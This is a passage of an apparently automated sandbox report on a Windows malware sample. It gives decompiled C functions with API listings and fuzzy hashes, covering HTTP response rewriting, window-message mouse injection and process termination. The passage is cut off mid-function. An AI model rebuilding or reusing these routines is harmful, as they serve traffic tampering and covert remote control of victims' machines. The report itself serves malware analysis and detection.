    • LeaveCriticalSection.KERNEL32(00423E40), ref: 004153A6
    • LeaveCriticalSection.KERNEL32(00423E40,?), ref: 004153ED
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 00415558
    • EnterCriticalSection.KERNEL32(00423E40), ref: 00415577
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 004155D9
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 00415602
    • EnterCriticalSection.KERNEL32(00423E40), ref: 00415621
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 00415669
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
    • String ID: @>B$Accept-Encoding$If-Modified-Since$identity
    • API String ID: 3286975823-3296971209
    • Opcode ID: 6797f89c01954efec44322b81482b2b8e90204253cdd242a44d6d0dba830163a
    • Instruction ID: 11c4516be5d184a6d5bd5eb187cff624ea92d841620890c5f564985e6b30c199
    • Opcode Fuzzy Hash: 6797f89c01954efec44322b81482b2b8e90204253cdd242a44d6d0dba830163a
    • Instruction Fuzzy Hash: C2A17D71504701EFC710EF24C845A9EBBA1FF88315F104A2EF859A32A1C778E995CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D83A(void** __eax, char _a4) {
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				long _t17;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				struct HDC__* _t23;
    				void* _t24;
    				void* _t25;
    				void** _t41;
    
    				_t41 = __eax;
    				_t15 =  *(__eax + 0x1c);
    				if(_t15 != 0) {
    					DeleteObject(_t15);
    				}
    				_t16 = _t41[3];
    				if(_t16 != 0) {
    					CloseHandle(_t16);
    				}
    				_t17 = _t41[1];
    				if(_t17 != 0xffffffff) {
    					TlsFree(_t17);
    				}
    				_t18 = _t41[5];
    				if(_t18 != 0) {
    					CloseHandle(_t18);
    				}
    				_t19 = _t41[4];
    				if(_t19 != 0) {
    					UnmapViewOfFile(_t19);
    				}
    				_t20 =  *_t41;
    				if(_t20 != 0) {
    					_t20 = CloseHandle(_t20);
    				}
    				if(_a4 != 0) {
    					_t21 = _t41[0x56];
    					if(_t21 != 0) {
    						SelectObject(_t41[0x55], _t21);
    					}
    					_t22 = _t41[0x57];
    					if(_t22 != 0) {
    						DeleteObject(_t22);
    					}
    					_t23 = _t41[0x55];
    					if(_t23 != 0) {
    						DeleteDC(_t23);
    					}
    					_t24 = _t41[0x58];
    					if(_t24 != 0) {
    						CloseHandle(_t24);
    					}
    					_t25 = _t41[0x60];
    					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
    						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
    					}
    					_t20 = E00408894( &(_t41[0x5f]));
    				}
    				return _t20;
    			}

    APIs
    • DeleteObject.GDI32(?), ref: 0040D84D
    • CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D85D
    • TlsFree.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D868
    • CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D876
    • UnmapViewOfFile.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D880
    • CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D88D
    • SelectObject.GDI32(?,?), ref: 0040D8A7
    • DeleteObject.GDI32(?), ref: 0040D8B8
    • DeleteDC.GDI32(?), ref: 0040D8C5
    • CloseHandle.KERNEL32(?,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D8D6
    • WaitForSingleObject.KERNEL32(?,00000000,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D8E5
    • PostThreadMessageW.USER32 ref: 0040D8FE
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 1699860549-0
    • Opcode ID: b1e30fe524973a513118a4083755fb0c4d68479e2d546d7bebe6913c5ab701de
    • Instruction ID: 79c4a75d3db085750ed02eccdb008617f6e76a9161a925b6184540af406312b7
    • Opcode Fuzzy Hash: b1e30fe524973a513118a4083755fb0c4d68479e2d546d7bebe6913c5ab701de
    • Instruction Fuzzy Hash: 4B21EC71B007019BD720ABB99D48F57B7EDAF44751F048939F965F72E0DB38E8488A28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E00415007(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char _v20;
    				signed char _v32;
    				char _v36;
    				char _v40;
    				signed int _v44;
    				void* _v48;
    				signed int _v52;
    				intOrPtr _v60;
    				intOrPtr _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t99;
    				signed int _t100;
    				signed int _t101;
    				intOrPtr _t103;
    				void* _t104;
    				signed int _t107;
    				signed int _t108;
    				signed int _t110;
    				intOrPtr _t119;
    				void* _t131;
    				signed int _t139;
    				void* _t149;
    				struct _CRITICAL_SECTION* _t153;
    				intOrPtr _t155;
    				signed int _t168;
    				signed int _t174;
    				char _t176;
    				void* _t177;
    				intOrPtr _t179;
    				void* _t182;
    				signed int _t183;
    				intOrPtr _t186;
    				void* _t188;
    				signed int _t189;
    				void* _t191;
    				void* _t192;
    				void* _t193;
    
    				_t99 = E00412FEE();
    				_t179 = _a4;
    				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
    					L40:
    					_t100 =  *0x423e64(_t179, _a8, _a12);
    					goto L41;
    				} else {
    					_t153 = 0x423e40;
    					EnterCriticalSection(0x423e40);
    					_t101 = E004143A5(_t179);
    					if(_t101 == 0xffffffff) {
    						L39:
    						LeaveCriticalSection(_t153);
    						goto L40;
    					}
    					_t103 = _t101 * 0x38 +  *0x423e5c;
    					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
    						L32:
    						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
    						_t85 = _t103 + 0x2c; // -4341296
    						_t173 = _t85;
    						__eflags = _a12 - _t182;
    						_t183 =  <  ? _a12 : _t182;
    						_t104 = E00406EC1(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
    						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
    						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
    						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
    							E00406F38(E00406E85( *_t173), _t173, 0, 0xc);
    						}
    						LeaveCriticalSection(_t153);
    						_t100 = _t183;
    						L41:
    						return _t100;
    					}
    					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
    						goto L39;
    					}
    					LeaveCriticalSection(0x423e40);
    					_t107 =  *0x423e64(_t179, _a8, _a12);
    					_v52 = _t107;
    					if(_t107 <= 0xffffffff) {
    						L38:
    						_t100 = _v52;
    						goto L41;
    					}
    					EnterCriticalSection(0x423e40);
    					_t108 = E004143A5(_t179);
    					_t174 = _t108;
    					if(_t174 == 0xffffffff) {
    						L35:
    						_push(8);
    						_push(0xffffe890);
    						L36:
    						 *0x423e3c();
    						_v52 = _v52 | 0xffffffff;
    						L37:
    						LeaveCriticalSection(_t153);
    						goto L38;
    					}
    					_t168 = _v52;
    					if(_t168 == 0) {
    						L11:
    						_t176 = _t174 * 0x38 +  *0x423e5c;
    						_v36 = _t176;
    						if(_t168 > 0) {
    							E00406EC1( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
    							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
    						}
    						_t110 = E00414C2B(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
    						_v52 = _t110;
    						if(_t110 == 1) {
    							_t119 = E00414DD5( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
    							_v60 = _t119;
    							if(_t119 == 1) {
    								if(E0041B69B( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
    									_t155 = _v40;
    									_t186 = E00406E55( *((intOrPtr*)(_t176 + 0x18)) - _v8 + _v12 + _t155 + 0x14);
    									_v40 = _t186;
    									if(_t186 != 0) {
    										_t131 = E00406EC1(_t186,  *((intOrPtr*)(_t176 + 0x14)), _v12);
    										_push(_t155);
    										if((_v32 & 0x00000002) == 0) {
    											E0040762E( &_v32);
    											_t188 = E0040BE28(_t186, _v16, "Content-Length",  &_v36) + _v60;
    											E00406EC1(_t188, _v68, _t155);
    											_t189 = _t188 + _t155;
    											__eflags = _t189;
    										} else {
    											_push("%x\r\n");
    											_t191 = _t186 + _t131;
    											_t177 = 0xd;
    											_t192 = _t191 + E00407BBC(_t131, _t177, _t191);
    											E00406EC1(_t192, _v48, _t155);
    											_t193 = _t192 + _t155;
    											E00406EC1(_t193, "\r\n0\r\n\r\n", 7);
    											_t176 = _v60;
    											_t189 = _t193 + 7;
    										}
    										_t137 =  *((intOrPtr*)(_t176 + 0x18));
    										if(_v8 !=  *((intOrPtr*)(_t176 + 0x18))) {
    											_t189 = _t189 + E00406EC1(_t189,  *((intOrPtr*)(_t176 + 0x14)) + _v8, _t137 - _v8);
    										}
    										E00406E85( *((intOrPtr*)(_t176 + 0x14)));
    										_t139 = _v44;
    										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
    										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
    									}
    								}
    								_v44 = _v44 | 0xffffffff;
    								E00406E85(_v48);
    							}
    							_t153 = 0x423e40;
    						}
    						if(_v52 <= 0) {
    							L29:
    							if(__eflags == 0) {
    								L31:
    								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
    								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
    								 *((intOrPtr*)(_t176 + 0x34)) = 0;
    								 *((intOrPtr*)(_t176 + 0x14)) = 0;
    								 *((intOrPtr*)(_t176 + 0x18)) = 0;
    								E0041BBB9( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
    								_t103 = _v40;
    								 *((intOrPtr*)(_t176 + 0x10)) = 0;
    								 *((intOrPtr*)(_t176 + 0xc)) = 0;
    								goto L32;
    							}
    							__eflags = _v44 - 0xffffffff;
    							if(_v44 != 0xffffffff) {
    								goto L37;
    							}
    							goto L31;
    						} else {
    							if(_v44 != 0) {
    								__eflags = _v52;
    								goto L29;
    							}
    							_push(0);
    							_push(0xffffe892);
    							goto L36;
    						}
    					}
    					_t149 = _t108 * 0x38 +  *0x423e5c;
    					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
    					_t11 = _t149 + 0x14; // -4341320
    					if(E00406E10( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
    						goto L35;
    					}
    					_t168 = _v52;
    					goto L11;
    				}
    			}

    APIs
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • EnterCriticalSection.KERNEL32(00423E40), ref: 00415043
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 00415071
    • EnterCriticalSection.KERNEL32(00423E40), ref: 00415095
    • LeaveCriticalSection.KERNEL32(00423E40,00000000,?,00000000), ref: 004152D8
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 004152F7
      • Part of subcall function 0040BE28: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 0040BE82
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    • LeaveCriticalSection.KERNEL32(00423E40), ref: 00415304
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
    • String ID: 0$%x$@>B$@>B$Content-Length
    • API String ID: 4067213518-3457078964
    • Opcode ID: af7a739ba4d56f59fe3186e5c7f44e3dc41d65d07cf364273b804ab0ed973fd4
    • Instruction ID: 12002e27cdff033a2eeaf141f9b20eba5626d8e06b844517c3c69709ea2a09e7
    • Opcode Fuzzy Hash: af7a739ba4d56f59fe3186e5c7f44e3dc41d65d07cf364273b804ab0ed973fd4
    • Instruction Fuzzy Hash: 7B91C172504701EFCB10DF25C88199ABBB4FF84314F01062AF855A32A1D778E9A5CFDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405885(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
    				char _v5;
    				long _v12;
    				signed char _v16;
    				struct tagRECT _v32;
    				char _v140;
    				void* __ebx;
    				void* __esi;
    				signed char _t47;
    				intOrPtr _t52;
    				void* _t85;
    				RECT* _t89;
    
    				_t89 = __edi;
    				_t86 = __ecx;
    				_t85 = __eax;
    				_t47 = E0040D568(_a4) & 0x0000ffff;
    				_v16 = _t47;
    				if((_t47 & 0x00000001) != 0) {
    					L16:
    					return 1;
    				}
    				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
    					_v5 = 0;
    				} else {
    					_t86 =  &_v140;
    					E0040B4DE( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
    					_v5 = E0040A668( &_v140);
    				}
    				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
    					L8:
    					if(E00405723(_t85, _t86) == 0) {
    						L14:
    						_t52 = _a8;
    						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
    							IntersectRect( &_v32, _t52 + 4, _t89);
    							FillRect( *(_t85 + 0x154),  &_v32, 6);
    							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
    						}
    						goto L16;
    					}
    					E00406EC1( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
    					ResetEvent( *(_t85 + 0xc));
    					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
    						goto L14;
    					}
    					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
    						TerminateProcess( *(_t85 + 0x17c), 0);
    						E00408894(_t85 + 0x17c);
    						goto L14;
    					}
    					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
    						goto L14;
    					}
    					return _v5;
    				} else {
    					ResetEvent( *(_t85 + 0xc));
    					_t86 = _t89->left & 0x0000ffff;
    					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
    						goto L8;
    					} else {
    						goto L16;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0040D568: GetClassNameW.USER32 ref: 0040D583
    • GetWindowThreadProcessId.USER32(?,?), ref: 004058AF
    • ResetEvent.KERNEL32(00000010), ref: 004058FE
    • PostMessageW.USER32(?,?,?,00000010), ref: 00405921
    • WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00405930
    • ResetEvent.KERNEL32(?,?,?,00000010), ref: 0040595B
    • PostThreadMessageW.USER32 ref: 0040596B
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0040597D
      • Part of subcall function 0040B4DE: StringFromGUID2.OLE32(00000000,?,00000028,00412EC2,?,00000010,00000000,77E49EB0), ref: 0040B57F
      • Part of subcall function 0040A668: OpenMutexW.KERNEL32(00100000,00000000,00000000,00413832,?,19367401,?,00000001,8889347B,00000002), ref: 0040A673
      • Part of subcall function 0040A668: CloseHandle.KERNEL32(00000000), ref: 0040A67E
    • TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 004059A2
      • Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088A3
      • Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088AC
    • IntersectRect.USER32 ref: 004059C2
    • FillRect.USER32 ref: 004059D4
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 004059E8
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
    • String ID:
    • API String ID: 2453266691-0
    • Opcode ID: 62988674af14cea373825c9a8720870a54d7227a4d4adfa5cf60c2b4c248b7a5
    • Instruction ID: 9e877e76457d3a6406cc9f9d6e6ab1a25c1c591600ec113dc4b7f21c8b52fff7
    • Opcode Fuzzy Hash: 62988674af14cea373825c9a8720870a54d7227a4d4adfa5cf60c2b4c248b7a5
    • Instruction Fuzzy Hash: 1C417B71900208FBEF109F60CC45BAA7BB8EF04354F0480B6F944FA1A2DB79D955DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E0040FEED(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				struct HWND__* _v8;
    				char _v12;
    				struct HWND__* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed char _v32;
    				intOrPtr _v68;
    				struct tagWINDOWINFO _v92;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t107;
    				struct HWND__* _t108;
    				int _t113;
    				int _t114;
    				signed char _t143;
    				struct HWND__* _t144;
    				long _t147;
    				struct HWND__* _t170;
    				long _t171;
    				void* _t174;
    
    				_t174 = __eax;
    				_t107 =  *((intOrPtr*)(__eax + 0x10));
    				_v16 = 0;
    				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
    					_t108 =  *((intOrPtr*)(_t107 + 0x108));
    					_v16 = _t108;
    					if(_t108 != 0) {
    						_v32 = E0040D915(0, __eax, 0) & 0x0000ffff;
    					} else {
    						_v32 = 0;
    					}
    				} else {
    					if((_a4 & 0x00000001) != 0) {
    						E0040FA5F(_a12, _a8, __eax);
    						_a4 = _a4 & 0xfffffffe;
    					}
    					if((_a4 & 0x00000004) != 0) {
    						E0040F9F0(0, _t174, 0, 0, 1);
    					}
    				}
    				_t143 = _a4;
    				 *( *(_t174 + 0x10) + 0x100) = _a8;
    				_t113 =  *(_t174 + 0x10);
    				 *(_t113 + 0x104) = _a12;
    				if(_t143 == 0) {
    					L69:
    					return _t113;
    				}
    				_v20 = _t143;
    				_t26 =  &_v20;
    				 *_t26 = _v20 & 0x00000002;
    				if( *_t26 == 0) {
    					if((_t143 & 0x00000004) == 0) {
    						goto L14;
    					} else {
    						_push(0);
    						goto L13;
    					}
    				} else {
    					_push(1);
    					L13:
    					E0040D915(1, _t174);
    					L14:
    					_v24 = _t143;
    					_t31 =  &_v24;
    					 *_t31 = _v24 & 0x00000020;
    					if( *_t31 == 0) {
    						if((_t143 & 0x00000040) == 0) {
    							L19:
    							_v28 = _t143;
    							_t36 =  &_v28;
    							 *_t36 = _v28 & 0x00000008;
    							if( *_t36 == 0) {
    								if((_t143 & 0x00000010) == 0) {
    									L24:
    									_t114 =  *(_t174 + 0x10);
    									_push( *((intOrPtr*)(_t114 + 0x104)));
    									_push( *((intOrPtr*)(_t114 + 0x100)));
    									0xc00000 = 0x64;
    									_t170 = E0040B5BA(0xc00000,  &_v12);
    									_t113 = _v12 + 0xfffffff6;
    									_v8 = _t170;
    									if(_t113 <= 7) {
    										_t113 = GetWindowLongW(_t170, 0xfffffff0);
    										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
    											_t113 = GetParent(_t170);
    											if(_t113 != 0) {
    												_v8 = _t113;
    												_t170 = _t113;
    											}
    										}
    									}
    									if(_t170 == 0) {
    										L35:
    										_t144 = _v16;
    										if(_t144 != 0) {
    											_t113 = IsWindow(_t144);
    											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
    												if(_a4 != 0x8001) {
    													_t113 = E0040F9F0(0, _t174, 0, 0, 1);
    												}
    											} else {
    												_v8 = _t144;
    												_v12 = 1;
    												_t170 = _t144;
    											}
    										}
    										goto L43;
    									} else {
    										_t113 = E0040D568(_t170);
    										if((_t113 & 0x00000040) == 0) {
    											goto L35;
    										}
    										if(_t170 != _v16) {
    											_t113 = E0040F9F0(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
    										}
    										_v12 = 1;
    										L43:
    										if(_t170 == 0) {
    											goto L69;
    										}
    										_v92.cbSize = 0x3c;
    										_t113 = GetWindowInfo(_t170,  &_v92);
    										if(_t113 == 0) {
    											goto L69;
    										}
    										_t113 = _a8 & 0x0000ffff;
    										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
    										if(_v12 != 1) {
    											_t171 = _a4;
    										} else {
    											_t113 = E0040D568(_t170);
    											if((_t113 & 0x00000020) == 0) {
    												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
    												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
    											} else {
    												_t171 = _t147;
    											}
    										}
    										if(_v20 == 0) {
    											if((_a4 & 0x00000004) == 0) {
    												goto L55;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa2);
    											_push(0x202);
    											goto L54;
    										} else {
    											_push(_t147);
    											_push(_t171);
    											_push(0xa1);
    											_push(0x201);
    											L54:
    											_push(_v12);
    											_push( &_v92);
    											_push(_v8);
    											_t113 = E0040FC5F(_t174, 0xc00000);
    											L55:
    											if(_v24 == 0) {
    												if((_a4 & 0x00000040) == 0) {
    													L60:
    													if(_v28 == 0) {
    														if((_a4 & 0x00000010) == 0) {
    															L65:
    															if((_a4 & 0x00000001) != 0) {
    																_t113 = E0040FC5F(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
    															}
    															if((_a4 & 0x00000800) != 0) {
    																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040D915(0, _t174, 0) & 0x0000ffff, _t147);
    															}
    															goto L69;
    														}
    														_push(_t147);
    														_push(_t171);
    														_push(0xa5);
    														_push(0x205);
    														L64:
    														_push(_v12);
    														_push( &_v92);
    														_push(_v8);
    														_t113 = E0040FC5F(_t174, 0xc00000);
    														goto L65;
    													}
    													_push(_t147);
    													_push(_t171);
    													_push(0xa4);
    													_push(0x204);
    													goto L64;
    												}
    												_push(_t147);
    												_push(_t171);
    												_push(0xa8);
    												_push(0x208);
    												L59:
    												_push(_v12);
    												_push( &_v92);
    												_push(_v8);
    												_t113 = E0040FC5F(_t174, 0xc00000);
    												goto L60;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa7);
    											_push(0x207);
    											goto L59;
    										}
    									}
    								}
    								_push(0);
    								L23:
    								E0040D915(2, _t174);
    								goto L24;
    							}
    							_push(1);
    							goto L23;
    						}
    						_push(0);
    						L18:
    						E0040D915(4, _t174);
    						goto L19;
    					}
    					_push(1);
    					goto L18;
    				}
    			}

    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040FFF9
    • GetParent.USER32(00000000), ref: 0041001B
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00410040
    • IsWindow.USER32(?), ref: 00410063
      • Part of subcall function 0040FA5F: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040FA73
      • Part of subcall function 0040FA5F: ReleaseMutex.KERNEL32(?), ref: 0040FA92
      • Part of subcall function 0040FA5F: GetWindowRect.USER32 ref: 0040FA9F
      • Part of subcall function 0040FA5F: IsRectEmpty.USER32(?), ref: 0040FB23
      • Part of subcall function 0040FA5F: GetWindowLongW.USER32(?,000000F0), ref: 0040FB32
      • Part of subcall function 0040FA5F: GetParent.USER32(?), ref: 0040FB48
      • Part of subcall function 0040FA5F: MapWindowPoints.USER32 ref: 0040FB51
      • Part of subcall function 0040FA5F: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040FB75
    • GetWindowInfo.USER32 ref: 004100B3
    • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 004101F0
      • Part of subcall function 0040F9F0: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040FE29,00000000), ref: 0040F9F6
      • Part of subcall function 0040F9F0: ReleaseMutex.KERNEL32(?), ref: 0040FA2A
      • Part of subcall function 0040F9F0: IsWindow.USER32(?), ref: 0040FA31
      • Part of subcall function 0040F9F0: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040FA4B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: $<$@
    • API String ID: 3705211839-2197183666
    • Opcode ID: 715f71e9e4daf49d519521859bdbe5b0cf0f0fbc8392d9b830686bac24821e8a
    • Instruction ID: da4b8684fd11d9f9c427d21c9de8b80ca785c36d5a629289bcd1a4ad511cff4d
    • Opcode Fuzzy Hash: 715f71e9e4daf49d519521859bdbe5b0cf0f0fbc8392d9b830686bac24821e8a
    • Instruction Fuzzy Hash: AB91A070600309BBEB219E95C889BFF7BB4AB45B08F14403AF9446A2D1C7BD9AC5D758
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0040E685(WCHAR* __ecx, signed char* _a4) {
    				char _v268;
    				char _v549;
    				signed short _v652;
    				signed short _v792;
    				char _v1044;
    				short _v1564;
    				short _v1568;
    				intOrPtr _v1572;
    				signed char* _v1576;
    				signed int _v1580;
    				char* _v1584;
    				void* _v1588;
    				intOrPtr _v1592;
    				intOrPtr _v1596;
    				char _v1600;
    				intOrPtr _v1604;
    				signed int _v1608;
    				signed int _v1612;
    				void* _v1613;
    				signed int _v1616;
    				void* __ebx;
    				void* __esi;
    				signed int _t60;
    				signed int _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t80;
    				signed int _t83;
    				long _t84;
    				long _t85;
    				signed int _t89;
    				signed int _t101;
    				signed int _t108;
    				signed int _t110;
    				WCHAR* _t123;
    				signed char _t125;
    				signed char* _t131;
    				signed int _t134;
    				void* _t136;
    				void* _t140;
    				signed int _t141;
    
    				_t128 = __ecx;
    				_t131 = _a4;
    				_t60 = E00412EC8(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
    				_v1612 = _t60;
    				if(_t60 != 0) {
    					_v1588 =  *0x423e2c;
    					_v1584 =  &_v268;
    					_v1596 = E0040E4E1;
    					_v1592 = E0040E61D;
    					_v1576 = _t131;
    					E00413167( &_v1044);
    					E00406EC1( &_v268,  &_v549, 0x102);
    					_t69 =  *_t131 & 0x000000ff;
    					__eflags = _t69;
    					if(_t69 == 0) {
    						_t71 = _v652 >> 0x10;
    						__eflags = _t71;
    						_v1612 = _t71;
    						_t72 = _v652 & 0x0000ffff;
    						goto L7;
    					} else {
    						__eflags = _t69 == 1;
    						if(_t69 == 1) {
    							_v1612 = _v792 >> 0x10;
    							_t72 = _v792 & 0x0000ffff;
    							L7:
    							_v1608 = _t72;
    						}
    					}
    					_v1612 = _v1612 * 0xea60;
    					_v1608 = _v1608 * 0xea60;
